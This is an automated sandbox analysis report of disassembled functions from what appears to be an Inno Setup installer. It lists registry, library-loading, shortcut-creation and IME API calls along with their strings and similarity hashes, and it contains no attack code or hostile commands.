Function 004CD61C, Relevance: 81.0, APIs: 1, Strings: 45, Instructions: 539registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CD3E0: RegSetValueExW.ADVAPI32(?,80000001,00000000,00000001,00000000,5.5.9 (u),?,?,0050BE1C,5.5.9 (u),?,004CD72A,?,00000000,004CDD07), ref: 004CD410

Part of subcall function 004CD45C: RegSetValueExW.ADVAPI32(?,NoModify,00000000,00000004,80000001,00000004,00000001,?,004CDB0C,?,0050BE00,004CE168,?,0050BE00,004CE168), ref: 004CD46F

RegCloseKey.ADVAPI32(?,004CDD0E,0050BE00,004CE168,?,?,00000000,004CDD07,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,004CDD5E), ref: 004CDD01

Strings

Inno Setup: User Info: Serial, xrefs: 004CD8BE
Inno Setup: No Icons, xrefs: 004CD7A1
Inno Setup: User Info: Name, xrefs: 004CD890
Inno Setup: Selected Components, xrefs: 004CD803
Inno Setup: Deselected Tasks, xrefs: 004CD870
Contact, xrefs: 004CDAA9
UninstallString, xrefs: 004CD991
Inno Setup: User, xrefs: 004CD7C0
DisplayIcon, xrefs: 004CD961
NoModify, xrefs: 004CDAFA
InstallDate, xrefs: 004CDB2D
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 004CD673
Inno Setup: App Path, xrefs: 004CD751
Inno Setup: Icon Group, xrefs: 004CD788
Inno Setup: Deselected Components, xrefs: 004CD824
DP, xrefs: 004CD695, 004CD6BB, 004CD6E7
ModifyPath, xrefs: 004CDAE6
Inno Setup: Setup Type, xrefs: 004CD7E2
Inno Setup: Selected Tasks, xrefs: 004CD84F
DisplayName, xrefs: 004CD944
RegisterPreviousData, xrefs: 004CDCBA
QuietUninstallString, xrefs: 004CD9C1
MajorVersion, xrefs: 004CDB59
HelpLink, xrefs: 004CDA52
EstimatedSize, xrefs: 004CDC79
Inno Setup: Setup Version, xrefs: 004CD718
DP, xrefs: 004CD8CD
InstallLocation, xrefs: 004CD771
" /SILENT, xrefs: 004CD9AC
DisplayVersion, xrefs: 004CD9DE
Publisher, xrefs: 004CD9FB
VersionMajor, xrefs: 004CDB7D
Readme, xrefs: 004CDA8C
5.5.9 (u), xrefs: 004CD71D
MinorVersion, xrefs: 004CDB6B
Inno Setup: User Info: Organization, xrefs: 004CD8A7
;fM, xrefs: 004CDB4C, 004CDB5E, 004CDB82
HelpTelephone, xrefs: 004CDA35
URLInfoAbout, xrefs: 004CDA18
VersionMinor, xrefs: 004CDB8F
_is1, xrefs: 004CD679
Inno Setup: Language, xrefs: 004CD8E3
URLUpdateInfo, xrefs: 004CDA6F
NoRepair, xrefs: 004CDB0E
Comments, xrefs: 004CDAC6

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Close
String ID: " /SILENT$5.5.9 (u)$;fM$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor$_is1$DP$DP
API String ID: 3391052094-2123206618
Opcode ID: 1ee3422a62ac34bd60bba25522660ffcf73b4ecb8910ded904615585e936d1e6
Instruction ID: e90bcf705b8dc27b037c79e055ba4e0e41e1ed9ca6b198ae192f2f43beeca4cb
Opcode Fuzzy Hash: 1ee3422a62ac34bd60bba25522660ffcf73b4ecb8910ded904615585e936d1e6
Instruction Fuzzy Hash: 68224E78A001089FDB44EB99D891FAEB3B5FB45304F10847EE911AB7A5DB78BC45CB18

Uniqueness

Uniqueness Score: -1.00%

Function 005000C4, Relevance: 42.2, APIs: 7, Strings: 17, Instructions: 160libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005000F7
GetVersion.KERNEL32(kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005000FE
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00500113
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00500139

Part of subcall function 0040A348: SetErrorMode.KERNEL32(00008000), ref: 0040A356
Part of subcall function 0040A348: LoadLibraryW.KERNEL32(00000000,00000000,0040A3A0,?,00000000,0040A3BE,?,00008000), ref: 0040A385

GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 005002E0
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 005002F6
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 00500301

Strings

SetSearchPathMode, xrefs: 005002DA
setupapi.dll, xrefs: 005001CF
SetDllDirectoryW, xrefs: 00500133
apphelp.dll, xrefs: 005001EA
kernel32.dll, xrefs: 005000F2
SetDefaultDllDirectories, xrefs: 0050010D
profapi.dll, xrefs: 0050028C
clbcatq.dll, xrefs: 005002C2
uxtheme.dll, xrefs: 00500199
oleacc.dll, xrefs: 00500256
SetProcessDEPPolicy, xrefs: 005002F0
cryptbase.dll, xrefs: 0050023B
dwmapi.dll, xrefs: 00500220
comres.dll, xrefs: 005002A7
userenv.dll, xrefs: 005001B4
propsys.dll, xrefs: 00500205
version.dll, xrefs: 00500271

Memory Dump Source

Source File: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$kernel32.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 2248137261-2388063882
Opcode ID: 91de36edd925217da7730ad6ba62f1ab4facad7773bf2a7a3f1b6a248a0ef859
Instruction ID: 1fae9e8ab5a4348ca83806bcf99570b94ec576fc91a19d887b2a623b3a0ce84c
Opcode Fuzzy Hash: 91de36edd925217da7730ad6ba62f1ab4facad7773bf2a7a3f1b6a248a0ef859
Instruction Fuzzy Hash: 2F513C706003449FCB00EBA5DD92FAE77A5BB84704F50543AE9817B2D2CE38AD25DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004D211C, Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 346fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4,?,004D2980,004D65D7), ref: 004D2292
DeleteFileW.KERNEL32(00000000,00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4,?,004D2980), ref: 004D22A0
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D22C0
DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000000,004D2579,?,?,00000000,00000000,00000009,00000000,00000000,0050BCD4), ref: 004D22CE

Strings

.pif, xrefs: 004D21AF, 004D235E
{group}\, xrefs: 004D216D
;fM, xrefs: 004D2305, 004D22D3
.url, xrefs: 004D21CA
Successfully created the icon., xrefs: 004D23BE
Dest filename: %s, xrefs: 004D2256
;fM, xrefs: 004D21E2
.lnk, xrefs: 004D2194
Creating the icon., xrefs: 004D22DB
target.lnk, xrefs: 004D246A
Desktop.ini, xrefs: 004D24A1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile$PrivateProfileStringWrite
String ID: .lnk$.pif$.url$;fM$;fM$Creating the icon.$Desktop.ini$Dest filename: %s$Successfully created the icon.$target.lnk${group}\
API String ID: 1102342611-4094692849
Opcode ID: ac1e8d52ebda9eea9254371aee95bb9c565f9c2eef2f440d5359f2dbd43ec989
Instruction ID: a72b0383e6c11fd7afd2810cfa57f9967996980f6b798d1eabeb7d5e750ec55e
Opcode Fuzzy Hash: ac1e8d52ebda9eea9254371aee95bb9c565f9c2eef2f440d5359f2dbd43ec989
Instruction Fuzzy Hash: CBD15374A00248AFDB01EB99C951FDEB7B4AF18304F10416BF901BB392C7B8AD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00469138, Relevance: 29.8, APIs: 4, Strings: 13, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 00469151
GetModuleHandleW.KERNEL32(USER32,00000000,0046929E,?,00008000), ref: 00469175

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

LoadLibraryW.KERNEL32(imm32.dll,00000000,0046929E,?,00008000), ref: 0046919E
SetErrorMode.KERNEL32(?,004692A5,00008000), ref: 00469298

Strings

USER32, xrefs: 00469170
ImmGetConversionStatus, xrefs: 004691DF
ImmSetConversionStatus, xrefs: 004691F4
ImmSetCompositionFontW, xrefs: 00469233
WINNLSEnableIME, xrefs: 0046917C
imm32.dll, xrefs: 00469199
ImmGetCompositionStringW, xrefs: 00469248
ImmGetContext, xrefs: 004691B5
ImmSetCompositionWindow, xrefs: 0046921E
ImmNotifyIME, xrefs: 00469272
ImmIsIME, xrefs: 0046925D
ImmReleaseContext, xrefs: 004691CA
ImmSetOpenStatus, xrefs: 00469209

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$AddressHandleLibraryLoadModuleProc
String ID: ImmGetCompositionStringW$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontW$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 380357001-1271369619
Opcode ID: cc255cebe79497f63cc62dd3eb15194d18d6a6ee4423562f12d96756175552fe
Instruction ID: a20cdc48d3bf8192737b9d12f2fa3ae1b41f6e2d35867b52f5b2177e1cc57648
Opcode Fuzzy Hash: cc255cebe79497f63cc62dd3eb15194d18d6a6ee4423562f12d96756175552fe
Instruction Fuzzy Hash: 6A314671A44740AEEB05DF66ED96A6E77ACE314708F10082BF400972A2E7BD4D48DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004D329C, Relevance: 28.6, APIs: 9, Strings: 7, Instructions: 634registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000000,00000002,00000000,00000000,004D3918,?,?,?,?,00000000,004D3A91,?,?,0050BE1C), ref: 004D3440
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,004D3918,?,?,?,?,00000000,004D3A91), ref: 004D3449

Part of subcall function 004D3024: GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30C0

RegDeleteValueW.ADVAPI32(00000000,00000000,00000000,004D3907,?,?,00000000,004D3918,?,?,?,?,00000000,004D3A91), ref: 004D356B

Part of subcall function 0047FCE8: RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0047FD14

Part of subcall function 004D3024: GetLastError.KERNEL32(0050BE1C,00000000,00000000,004D3107,?,?,0050BE1C,00000000), ref: 004D30D6

Strings

Cannot access 64-bit registry keys on this version of Windows, xrefs: 004D3394
;fM, xrefs: 004D3A7B, 004D385B, 004D38A4, 004D38B1, 004D3898, 004D38B0
Failed to parse "qword" value, xrefs: 004D3808
olddata, xrefs: 004D3670, 004D36D1
break, xrefs: 004D36DF
DP, xrefs: 004D3369
{olddata}, xrefs: 004D3603, 004D369C

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteErrorLastValue$CloseCreate
String ID: ;fM$Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}$DP
API String ID: 2638610037-2916852023
Opcode ID: 1b35347090e7092260726b58b4cdc86ae93e41c8e7c37c5a7c516a8944222121
Instruction ID: c7e518b5af4477074ed9011177b13307d6367f39890e34b0eed2304e6183ed18
Opcode Fuzzy Hash: 1b35347090e7092260726b58b4cdc86ae93e41c8e7c37c5a7c516a8944222121
Instruction Fuzzy Hash: 1642F774A002589FDB10DFA9C895B9EB7F4BF08305F4440ABE905AB392C778EE45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047B4AC, Relevance: 19.9, APIs: 13, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20e96e510084b5531ad26f5b8070cd2c5af7fa3745d22eae3f25dae425ac069
Instruction ID: 742d3f5ed802d9271d9bffeb4ef0ec10d082987a2623d0121d7fd6f12202aa94
Opcode Fuzzy Hash: a20e96e510084b5531ad26f5b8070cd2c5af7fa3745d22eae3f25dae425ac069
Instruction Fuzzy Hash: 01F14D30600208DFDB11DF69C585BDEB7B1EF08314F14C5A6E809AB766C738AE45DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004DE288, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 193COMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(?,004DE4AA,?,00000005,00000000,00000000,?,004FCCF4,00000006,?,00000000,004FD285,?,00000000,004FD344), ref: 004DE49D
CoTaskMemFree.OLE32(?,004DE4FD,?,00000005,00000000,00000000,?,004FCCF4,00000006,?,00000000,004FD285,?,00000000,004FD344), ref: 004DE4F0

Strings

cmd.exe, xrefs: 004DE51B
\Program Files, xrefs: 004DE37C
ProgramFilesDir, xrefs: 004DE355, 004DE3DC
Failed to get path of 64-bit Common Files directory, xrefs: 004DE42D
Common Files, xrefs: 004DE3C6
CommonFilesDir, xrefs: 004DE38F, 004DE40B
COMMAND.COM, xrefs: 004DE53C
SystemDrive, xrefs: 004DE2F2
Failed to get path of 64-bit Program Files directory, xrefs: 004DE3FE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 734271698-544719455
Opcode ID: d49f1c2fb619bb62809ca1bff4e30279b716bbd861104faecc848d21feb32ee1
Instruction ID: b8caeeca8f96ab44b67d8ef63914c586ba38b2995f5742af6ff0583ae043f2bf
Opcode Fuzzy Hash: d49f1c2fb619bb62809ca1bff4e30279b716bbd861104faecc848d21feb32ee1
Instruction Fuzzy Hash: E771A6756002059FEB10FB96D8A2B9EB7A5EB88708F608477F4016B381D73C9D05DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0047ABF0, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 131windowregistryCOMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 0047AC52
RegisterClassW.USER32 ref: 0047AC6A

Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1

SetWindowLongW.USER32 ref: 0047AD0A
SendMessageW.USER32(8840C01B,00000080,00000001,00000000), ref: 0047AD2F
SetClassLongW.USER32(8840C01B,000000F2,00000000), ref: 0047AD45
GetSystemMenu.USER32(8840C01B,00000000,8840C01B,000000FC,56022444,00000000,00400000,00000000,00000000,00000000,00000000,00000000), ref: 0047AD53
DeleteMenu.USER32(00000000,0000F030,00000000,8840C01B,00000000,8840C01B,000000FC,56022444,00000000,00400000,00000000,00000000,00000000,00000000,00000000), ref: 0047AD62
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,8840C01B,00000000,8840C01B,000000FC,56022444,00000000,00400000,00000000,00000000,00000000), ref: 0047AD6F
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,8840C01B,00000000,8840C01B,000000FC,56022444,00000000,00400000), ref: 0047AD86

Strings

T`P, xrefs: 0047AC19
8B, xrefs: 0047AC86

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$InfoLoadMessageRegisterSendStringSystemWindow
String ID: 8B$T`P
API String ID: 2334458219-3527321834
Opcode ID: 56a1d5afc7dc3222354fb52da9ba347f09e856a8e438ff6c301da5625b82f527
Instruction ID: 8541d3cd1cdf845da61a4b1f88b0931a71af77d491e3ba0bb05bdbbd616d903d
Opcode Fuzzy Hash: 56a1d5afc7dc3222354fb52da9ba347f09e856a8e438ff6c301da5625b82f527
Instruction Fuzzy Hash: 964153716042006FEB11EB79DC81FAE37A9BB44304F544575F908EF2E2DA79AC148729

Uniqueness

Uniqueness Score: -1.00%

Function 00469620, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 108registrythreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,004697AB), ref: 00469641
GlobalAddAtomW.KERNEL32 ref: 00469674
GetCurrentThreadId.KERNEL32 ref: 0046968F
GlobalAddAtomW.KERNEL32 ref: 004696C5
RegisterWindowMessageW.USER32(00000000,00000000,?,00000000,?,00000000,004697AB), ref: 004696DB

Part of subcall function 00423814: InitializeCriticalSection.KERNEL32(00420E94,?,?,004696F1,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 00423833

Part of subcall function 00469138: SetErrorMode.KERNEL32(00008000), ref: 00469151
Part of subcall function 00469138: GetModuleHandleW.KERNEL32(USER32,00000000,0046929E,?,00008000), ref: 00469175
Part of subcall function 00469138: LoadLibraryW.KERNEL32(imm32.dll,00000000,0046929E,?,00008000), ref: 0046919E
Part of subcall function 00469138: SetErrorMode.KERNEL32(?,004692A5,00008000), ref: 00469298

Part of subcall function 004793CC: GetKeyboardLayout.USER32 ref: 00479411
Part of subcall function 004793CC: GetDC.USER32(00000000), ref: 00479466
Part of subcall function 004793CC: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00479470
Part of subcall function 004793CC: ReleaseDC.USER32 ref: 0047947B

Part of subcall function 0047A828: OleInitialize.OLE32(00000000), ref: 0047A859
Part of subcall function 0047A828: LoadIconW.USER32(00400000,MAINICON), ref: 0047A944
Part of subcall function 0047A828: GetModuleFileNameW.KERNEL32(00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0047A988

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004697AB), ref: 0046975E

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

Strings

AnimateWindow, xrefs: 0046977D
Delphi%.8X, xrefs: 00469652
USER32, xrefs: 00469759
4YE, xrefs: 0046974A
ControlOfs%.8X%.8X, xrefs: 004696A3

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$AtomCurrentErrorGlobalHandleInitializeLoadMode$AddressCapsCriticalDeviceFileIconKeyboardLayoutLibraryMessageNameProcProcessRegisterReleaseSectionThreadWindow
String ID: 4YE$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 2902964639-2600279602
Opcode ID: 7968c25497fd82bd1cd5d9b5be7d164db108b0ff4fd483f6d56e33063d0860d8
Instruction ID: dbbcc6664016fbe0662ba1cc9e706fe81c7e7fe52a1c5dd0642bc4d89a2b8b3e
Opcode Fuzzy Hash: 7968c25497fd82bd1cd5d9b5be7d164db108b0ff4fd483f6d56e33063d0860d8
Instruction Fuzzy Hash: B6418170A002059FD700FF6ADC92A9E77E8EB19308B51843BF415E73A2E7799D089B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004E69BC, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E69CD

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004E69E8

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000), ref: 00409666

GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004E69FC
GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004E6A30
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004E6A4D

Strings

GetSystemWow64DirectoryA, xrefs: 004E6A17
RegDeleteKeyExA, xrefs: 004E6A26
kernel32.dll, xrefs: 004E69C8
advapi32.dll, xrefs: 004E6A2B
GetNativeSystemInfo, xrefs: 004E69D4
IsWow64Process, xrefs: 004E69EA

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
